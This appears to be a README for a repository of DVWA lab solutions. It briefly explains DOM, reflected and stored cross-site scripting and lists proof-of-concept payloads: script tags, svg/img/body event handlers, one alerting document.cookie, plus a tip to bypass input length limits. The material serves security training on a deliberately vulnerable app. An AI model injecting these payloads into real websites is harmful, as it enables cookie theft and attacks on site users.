Welcome to the DVWA XSS Solutions repository! This repository contains comprehensive solutions for Cross-Site Scripting (XSS) vulnerabilities in the Damn Vulnerable Web Application (DVWA). These solutions are meticulously provided by Nihar Rathod, also known as BugBot19
The Damn Vulnerable Web Application (DVWA) is a popular web application designed for security professionals and enthusiasts to practice their web security skills in a legal and safe environment. This repository focuses on addressing and mitigating XSS vulnerabilities, one of the most common and critical web security issues.
A DOM-based cross-site scripting (XSS) attack happens when a threat actor modifies the document object model (DOM) environment in the victim's browser. So, while the HTML itself doesn't change, the code on the client side executes differently.
Payload-<script>alert('BugBot19 was here')</script>
Payload-<script>alert('BugBot19 was here')</script>
Payload-<script>alert('BugBot19 was here')</script>
reflected XSS is a kind of cross-site scripting attack, where malicious script is injected into websites that are trusted or otherwise benign. Typically, the injection occurs when an unsuspecting user clicks on a link that is specifically designed to attack the website they are visiting.
During the research phase, I found out that one of the payloads can be used in all three levels the payload is mentioned below
Payload-<svg onload=alert('BugBot19 was here')>
Stored XSS, also known as persistent XSS, is the more damaging of the two. It occurs when a malicious script is injected directly into a vulnerable web application. Reflected XSS involves the reflecting of a malicious script off of a web application, onto a user's browser.
Payload - <script>alert(document.domain)</script>
Payload - <img src=x onerror=alert(document.cookie)>
Change the text 'size' and 'max length'
Payload - <body onload=alert('Bugbot19')>
Change the text 'size' and 'max length'
